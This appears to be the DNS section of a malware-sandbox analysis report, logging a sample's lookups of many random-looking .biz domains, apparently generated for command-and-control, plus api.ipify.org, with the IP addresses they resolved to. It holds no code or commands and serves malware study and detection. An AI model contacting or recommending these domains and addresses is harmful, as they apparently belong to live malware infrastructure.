                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.633322001 CET53653821.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:30.671891928 CET5670353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:30.678826094 CET53567031.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:31.856612921 CET5972553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:31.954221964 CET53597251.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:32.967144012 CET5791953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:32.976177931 CET53579191.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:33.598371983 CET6312853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:33.607088089 CET53631281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:34.411340952 CET6376953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:34.418792963 CET53637691.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:36.116193056 CET5839053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:36.123739004 CET53583901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:36.761923075 CET5182553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:36.768996000 CET53518251.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:37.744673014 CET5851853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:37.761341095 CET53585181.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:38.787779093 CET6244153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:38.798327923 CET53624411.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.487988949 CET6058353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.515474081 CET53605831.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.184302092 CET6347753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.202935934 CET53634771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.276372910 CET4926553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.293100119 CET4926553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.295517921 CET53492651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.306484938 CET53492651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.172590971 CET5006353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.188453913 CET53500631.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.934103966 CET5032953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.942035913 CET53503291.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:44.877763033 CET4999653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:44.884773016 CET53499961.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.538969994 CET5802053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.548763990 CET53580201.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.558526039 CET5802053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.567385912 CET53580201.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.293180943 CET5297453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.301455975 CET53529741.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:48.026285887 CET5950553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:48.034125090 CET53595051.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:50.225636959 CET6437753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:50.243823051 CET53643771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:50.244327068 CET5273153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:50.262878895 CET53527311.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.194430113 CET5029053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.214911938 CET5029053192.168.2.51.1.1.1
Nov 20, 2024 10:26:51.228357077 CET | 53 | 50290 | 1.1.1.1 | 192.168.2.5
Nov 20, 2024 10:26:51.252304077 CET | 53 | 50290 | 1.1.1.1 | 192.168.2.5
Nov 20, 2024 10:26:51.793692112 CET | 57516 | 53 | 192.168.2.5 | 1.1.1.1
Nov 20, 2024 10:26:51.824219942 CET | 57516 | 53 | 192.168.2.5 | 1.1.1.1
Nov 20, 2024 10:26:51.989473104 CET | 53 | 57516 | 1.1.1.1 | 192.168.2.5
Nov 20, 2024 10:26:51.990127087 CET | 53 | 57516 | 1.1.1.1 | 192.168.2.5
Nov 20, 2024 10:26:53.622525930 CET | 50216 | 53 | 192.168.2.5 | 1.1.1.1
Nov 20, 2024 10:26:53.638398886 CET | 53 | 50216 | 1.1.1.1 | 192.168.2.5
Nov 20, 2024 10:26:55.124089956 CET | 54440 | 53 | 192.168.2.5 | 1.1.1.1
Nov 20, 2024 10:26:55.131545067 CET | 53 | 54440 | 1.1.1.1 | 192.168.2.5
Nov 20, 2024 10:26:55.893620968 CET | 50944 | 53 | 192.168.2.5 | 1.1.1.1
Nov 20, 2024 10:26:55.911798954 CET | 53 | 50944 | 1.1.1.1 | 192.168.2.5
Nov 20, 2024 10:26:57.519984007 CET | 53330 | 53 | 192.168.2.5 | 1.1.1.1
Nov 20, 2024 10:26:57.530479908 CET | 53 | 53330 | 1.1.1.1 | 192.168.2.5
Nov 20, 2024 10:26:58.965610981 CET | 50150 | 53 | 192.168.2.5 | 1.1.1.1
Nov 20, 2024 10:26:58.973265886 CET | 53 | 50150 | 1.1.1.1 | 192.168.2.5
Nov 20, 2024 10:26:59.955580950 CET | 62597 | 53 | 192.168.2.5 | 1.1.1.1
Nov 20, 2024 10:26:59.963804007 CET | 53 | 62597 | 1.1.1.1 | 192.168.2.5
Nov 20, 2024 10:27:00.571022987 CET | 63630 | 53 | 192.168.2.5 | 1.1.1.1
Nov 20, 2024 10:27:00.582017899 CET | 53 | 63630 | 1.1.1.1 | 192.168.2.5
Nov 20, 2024 10:27:01.873476982 CET | 61500 | 53 | 192.168.2.5 | 1.1.1.1
Nov 20, 2024 10:27:01.882874012 CET | 53 | 61500 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 20, 2024 10:24:33.477576017 CET | 192.168.2.5 | 1.1.1.1 | 0x6151 | Standard query (0) | gxe0.com | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:43.545243979 CET | 192.168.2.5 | 1.1.1.1 | 0xc1cc | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:48.208996058 CET | 192.168.2.5 | 1.1.1.1 | 0x62fc | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:50.651407003 CET | 192.168.2.5 | 1.1.1.1 | 0x6fd5 | Standard query (0) | cvgrf.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:52.620714903 CET | 192.168.2.5 | 1.1.1.1 | 0xe642 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:52.810729980 CET | 192.168.2.5 | 1.1.1.1 | 0xf3f7 | Standard query (0) | npukfztj.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:53.747785091 CET | 192.168.2.5 | 1.1.1.1 | 0x1142 | Standard query (0) | przvgke.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:57.102452993 CET | 192.168.2.5 | 1.1.1.1 | 0x4339 | Standard query (0) | zlenh.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:57.177822113 CET | 192.168.2.5 | 1.1.1.1 | 0x186c | Standard query (0) | knjghuig.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:59.883996964 CET | 192.168.2.5 | 1.1.1.1 | 0xc1bb | Standard query (0) | uhxqin.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:59.895046949 CET | 192.168.2.5 | 1.1.1.1 | 0xefc6 | Standard query (0) | anpmnmxo.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:59.905577898 CET | 192.168.2.5 | 1.1.1.1 | 0xfeb8 | Standard query (0) | lpuegx.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:00.228188992 CET | 192.168.2.5 | 1.1.1.1 | 0x5432 | Standard query (0) | s82.gocheapweb.com | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:06.892848969 CET | 192.168.2.5 | 1.1.1.1 | 0x362b | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:10.747090101 CET | 192.168.2.5 | 1.1.1.1 | 0xf75c | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:12.798336029 CET | 192.168.2.5 | 1.1.1.1 | 0xa00e | Standard query (0) | cvgrf.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:14.672034979 CET | 192.168.2.5 | 1.1.1.1 | 0xb4eb | Standard query (0) | npukfztj.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:15.402425051 CET | 192.168.2.5 | 1.1.1.1 | 0x79ed | Standard query (0) | przvgke.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:17.125350952 CET | 192.168.2.5 | 1.1.1.1 | 0x911d | Standard query (0) | zlenh.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:17.134094000 CET | 192.168.2.5 | 1.1.1.1 | 0xca77 | Standard query (0) | knjghuig.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:19.944242001 CET | 192.168.2.5 | 1.1.1.1 | 0xa6e7 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:22.054507971 CET | 192.168.2.5 | 1.1.1.1 | 0x196c | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:24.378278017 CET | 192.168.2.5 | 1.1.1.1 | 0xb437 | Standard query (0) | cvgrf.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:25.707298994 CET | 192.168.2.5 | 1.1.1.1 | 0xd1cd | Standard query (0) | npukfztj.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:26.514301062 CET | 192.168.2.5 | 1.1.1.1 | 0x67f1 | Standard query (0) | przvgke.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:27.870697975 CET | 192.168.2.5 | 1.1.1.1 | 0x992b | Standard query (0) | zlenh.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:27.879440069 CET | 192.168.2.5 | 1.1.1.1 | 0x8958 | Standard query (0) | knjghuig.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:29.374777079 CET | 192.168.2.5 | 1.1.1.1 | 0x88c5 | Standard query (0) | uhxqin.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:29.384620905 CET | 192.168.2.5 | 1.1.1.1 | 0xe9b9 | Standard query (0) | anpmnmxo.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:29.398205996 CET | 192.168.2.5 | 1.1.1.1 | 0xf9cb | Standard query (0) | lpuegx.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:40.837394953 CET | 192.168.2.5 | 1.1.1.1 | 0x214b | Standard query (0) | vjaxhpbji.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:24.304610968 CET | 192.168.2.5 | 1.1.1.1 | 0xd0ca | Standard query (0) | xlfhhhm.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:26.060353994 CET | 192.168.2.5 | 1.1.1.1 | 0x5983 | Standard query (0) | ifsaia.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:27.984584093 CET | 192.168.2.5 | 1.1.1.1 | 0xf5f4 | Standard query (0) | saytjshyf.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:28.532308102 CET | 192.168.2.5 | 1.1.1.1 | 0xb80c | Standard query (0) | vcddkls.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:30.671891928 CET | 192.168.2.5 | 1.1.1.1 | 0xbddf | Standard query (0) | fwiwk.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:31.856612921 CET | 192.168.2.5 | 1.1.1.1 | 0x87b3 | Standard query (0) | tbjrpv.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:32.967144012 CET | 192.168.2.5 | 1.1.1.1 | 0x23f1 | Standard query (0) | deoci.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:33.598371983 CET | 192.168.2.5 | 1.1.1.1 | 0x9884 | Standard query (0) | gytujflc.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:34.411340952 CET | 192.168.2.5 | 1.1.1.1 | 0xca37 | Standard query (0) | qaynky.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:36.116193056 CET | 192.168.2.5 | 1.1.1.1 | 0x48f4 | Standard query (0) | bumxkqgxu.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:36.761923075 CET | 192.168.2.5 | 1.1.1.1 | 0x8f16 | Standard query (0) | dwrqljrr.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:37.744673014 CET | 192.168.2.5 | 1.1.1.1 | 0x1564 | Standard query (0) | nqwjmb.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:38.787779093 CET | 192.168.2.5 | 1.1.1.1 | 0xe95e | Standard query (0) | ytctnunms.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:39.487988949 CET | 192.168.2.5 | 1.1.1.1 | 0xc051 | Standard query (0) | myups.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:41.184302092 CET | 192.168.2.5 | 1.1.1.1 | 0xb258 | Standard query (0) | oshhkdluh.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:42.276372910 CET | 192.168.2.5 | 1.1.1.1 | 0x9c4e | Standard query (0) | yunalwv.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:42.293100119 CET | 192.168.2.5 | 1.1.1.1 | 0x9c4e | Standard query (0) | yunalwv.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:43.172590971 CET | 192.168.2.5 | 1.1.1.1 | 0xeab5 | Standard query (0) | jpskm.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:43.934103966 CET | 192.168.2.5 | 1.1.1.1 | 0x73a3 | Standard query (0) | lrxdmhrr.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:44.877763033 CET | 192.168.2.5 | 1.1.1.1 | 0xbfd | Standard query (0) | wllvnzb.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:46.538969994 CET | 192.168.2.5 | 1.1.1.1 | 0x32c6 | Standard query (0) | gnqgo.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:46.558526039 CET | 192.168.2.5 | 1.1.1.1 | 0x32c6 | Standard query (0) | gnqgo.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:47.293180943 CET | 192.168.2.5 | 1.1.1.1 | 0xb497 | Standard query (0) | jhvzpcfg.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:48.026285887 CET | 192.168.2.5 | 1.1.1.1 | 0xd414 | Standard query (0) | acwjcqqv.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:50.225636959 CET | 192.168.2.5 | 1.1.1.1 | 0xdbee | Standard query (0) | lejtdj.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:50.244327068 CET | 192.168.2.5 | 1.1.1.1 | 0xe82f | Standard query (0) | vyome.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:51.194430113 CET | 192.168.2.5 | 1.1.1.1 | 0x722c | Standard query (0) | yauexmxk.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:51.214911938 CET | 192.168.2.5 | 1.1.1.1 | 0x722c | Standard query (0) | yauexmxk.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:51.793692112 CET | 192.168.2.5 | 1.1.1.1 | 0xacd1 | Standard query (0) | iuzpxe.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:51.824219942 CET | 192.168.2.5 | 1.1.1.1 | 0xacd1 | Standard query (0) | iuzpxe.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:53.622525930 CET | 192.168.2.5 | 1.1.1.1 | 0x68f8 | Standard query (0) | sxmiywsfv.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:55.124089956 CET | 192.168.2.5 | 1.1.1.1 | 0x4545 | Standard query (0) | vrrazpdh.biz | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:55.893620968 CET | 192.168.2.5 | 1.1.1.1 | 0x7267 | Standard query (0) | ftxlah.biz | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.519984007 CET192.168.2.51.1.1.10x4d6eStandard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:58.965610981 CET192.168.2.51.1.1.10x87a3Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.955580950 CET192.168.2.51.1.1.10x90e1Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:27:00.571022987 CET192.168.2.51.1.1.10x37f1Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:27:01.873476982 CET192.168.2.51.1.1.10xc310Standard query (0)brsua.bizA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 20, 2024 10:24:33.522897005 CET | 1.1.1.1 | 192.168.2.5 | 0x6151 | No error (0) | gxe0.com |  | 198.252.105.91 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:43.640542984 CET | 1.1.1.1 | 192.168.2.5 | 0xc1cc | No error (0) | pywolwnvd.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:48.215889931 CET | 1.1.1.1 | 192.168.2.5 | 0x62fc | No error (0) | ssbzmoy.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:50.659183025 CET | 1.1.1.1 | 192.168.2.5 | 0x6fd5 | No error (0) | cvgrf.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:52.628086090 CET | 1.1.1.1 | 192.168.2.5 | 0xe642 | No error (0) | api.ipify.org |  | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:52.628086090 CET | 1.1.1.1 | 192.168.2.5 | 0xe642 | No error (0) | api.ipify.org |  | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:52.628086090 CET | 1.1.1.1 | 192.168.2.5 | 0xe642 | No error (0) | api.ipify.org |  | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:52.817698956 CET | 1.1.1.1 | 192.168.2.5 | 0xf3f7 | No error (0) | npukfztj.biz |  | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:54.649233103 CET | 1.1.1.1 | 192.168.2.5 | 0x1142 | No error (0) | przvgke.biz |  | 172.234.222.143 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:54.649233103 CET | 1.1.1.1 | 192.168.2.5 | 0x1142 | No error (0) | przvgke.biz |  | 172.234.222.138 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:57.109997034 CET | 1.1.1.1 | 192.168.2.5 | 0x4339 | Name error (3) | zlenh.biz | none | none | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:57.185988903 CET | 1.1.1.1 | 192.168.2.5 | 0x186c | No error (0) | knjghuig.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:59.894267082 CET | 1.1.1.1 | 192.168.2.5 | 0xc1bb | Name error (3) | uhxqin.biz | none | none | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:59.904814959 CET | 1.1.1.1 | 192.168.2.5 | 0xefc6 | Name error (3) | anpmnmxo.biz | none | none | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:24:59.914540052 CET | 1.1.1.1 | 192.168.2.5 | 0xfeb8 | No error (0) | lpuegx.biz |  | 82.112.184.197 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:00.239851952 CET | 1.1.1.1 | 192.168.2.5 | 0x5432 | No error (0) | s82.gocheapweb.com |  | 51.195.88.199 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:06.902735949 CET | 1.1.1.1 | 192.168.2.5 | 0x362b | No error (0) | pywolwnvd.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:10.755197048 CET | 1.1.1.1 | 192.168.2.5 | 0xf75c | No error (0) | ssbzmoy.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:12.809564114 CET | 1.1.1.1 | 192.168.2.5 | 0xa00e | No error (0) | cvgrf.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:14.680293083 CET | 1.1.1.1 | 192.168.2.5 | 0xb4eb | No error (0) | npukfztj.biz |  | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:15.410506964 CET | 1.1.1.1 | 192.168.2.5 | 0x79ed | No error (0) | przvgke.biz |  | 172.234.222.138 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:15.410506964 CET | 1.1.1.1 | 192.168.2.5 | 0x79ed | No error (0) | przvgke.biz |  | 172.234.222.143 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:17.133481026 CET | 1.1.1.1 | 192.168.2.5 | 0x911d | Name error (3) | zlenh.biz | none | none | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:17.144624949 CET | 1.1.1.1 | 192.168.2.5 | 0xca77 | No error (0) | knjghuig.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:19.954693079 CET | 1.1.1.1 | 192.168.2.5 | 0xa6e7 | No error (0) | pywolwnvd.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:22.064729929 CET | 1.1.1.1 | 192.168.2.5 | 0x196c | No error (0) | ssbzmoy.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:24.385643005 CET | 1.1.1.1 | 192.168.2.5 | 0xb437 | No error (0) | cvgrf.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:25.716018915 CET | 1.1.1.1 | 192.168.2.5 | 0xd1cd | No error (0) | npukfztj.biz |  | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:26.521717072 CET | 1.1.1.1 | 192.168.2.5 | 0x67f1 | No error (0) | przvgke.biz |  | 172.234.222.138 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:26.521717072 CET | 1.1.1.1 | 192.168.2.5 | 0x67f1 | No error (0) | przvgke.biz |  | 172.234.222.143 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:27.878885984 CET | 1.1.1.1 | 192.168.2.5 | 0x992b | Name error (3) | zlenh.biz | none | none | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:27.886940002 CET | 1.1.1.1 | 192.168.2.5 | 0x8958 | No error (0) | knjghuig.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:29.384037971 CET | 1.1.1.1 | 192.168.2.5 | 0x88c5 | Name error (3) | uhxqin.biz | none | none | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:29.394486904 CET | 1.1.1.1 | 192.168.2.5 | 0xe9b9 | Name error (3) | anpmnmxo.biz | none | none | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:29.408608913 CET | 1.1.1.1 | 192.168.2.5 | 0xf9cb | No error (0) | lpuegx.biz |  | 82.112.184.197 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:25:40.844724894 CET | 1.1.1.1 | 192.168.2.5 | 0x214b | No error (0) | vjaxhpbji.biz |  | 82.112.184.197 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:24.315839052 CET | 1.1.1.1 | 192.168.2.5 | 0xd0ca | No error (0) | xlfhhhm.biz |  | 47.129.31.212 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:26.067043066 CET | 1.1.1.1 | 192.168.2.5 | 0x5983 | No error (0) | ifsaia.biz |  | 13.251.16.150 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:27.994062901 CET | 1.1.1.1 | 192.168.2.5 | 0xf5f4 | No error (0) | saytjshyf.biz |  | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:28.633322001 CET | 1.1.1.1 | 192.168.2.5 | 0xb80c | No error (0) | vcddkls.biz |  | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:30.678826094 CET | 1.1.1.1 | 192.168.2.5 | 0xbddf | No error (0) | fwiwk.biz |  | 172.234.222.143 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:30.678826094 CET | 1.1.1.1 | 192.168.2.5 | 0xbddf | No error (0) | fwiwk.biz |  | 172.234.222.138 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:31.954221964 CET | 1.1.1.1 | 192.168.2.5 | 0x87b3 | No error (0) | tbjrpv.biz |  | 34.246.200.160 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:32.976177931 CET | 1.1.1.1 | 192.168.2.5 | 0x23f1 | No error (0) | deoci.biz |  | 18.208.156.248 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:33.607088089 CET | 1.1.1.1 | 192.168.2.5 | 0x9884 | No error (0) | gytujflc.biz |  | 208.100.26.245 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:34.418792963 CET | 1.1.1.1 | 192.168.2.5 | 0xca37 | No error (0) | qaynky.biz |  | 13.251.16.150 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:36.123739004 CET | 1.1.1.1 | 192.168.2.5 | 0x48f4 | No error (0) | bumxkqgxu.biz |  | 44.221.84.105 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:36.768996000 CET | 1.1.1.1 | 192.168.2.5 | 0x8f16 | No error (0) | dwrqljrr.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:37.761341095 CET | 1.1.1.1 | 192.168.2.5 | 0x1564 | No error (0) | nqwjmb.biz |  | 35.164.78.200 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:38.798327923 CET | 1.1.1.1 | 192.168.2.5 | 0xe95e | No error (0) | ytctnunms.biz |  | 3.94.10.34 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:39.515474081 CET | 1.1.1.1 | 192.168.2.5 | 0xc051 | No error (0) | myups.biz |  | 165.160.15.20 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:39.515474081 CET | 1.1.1.1 | 192.168.2.5 | 0xc051 | No error (0) | myups.biz |  | 165.160.13.20 | A (IP address) | IN (0x0001) | false
Nov 20, 2024 10:26:41.202935934 CET | 1.1.1.1 | 192.168.2.5 | 0xb258 | No error (0) | oshhkdluh.biz |  | 54.244.188.177 | A (IP address) | IN (0x0001) | false
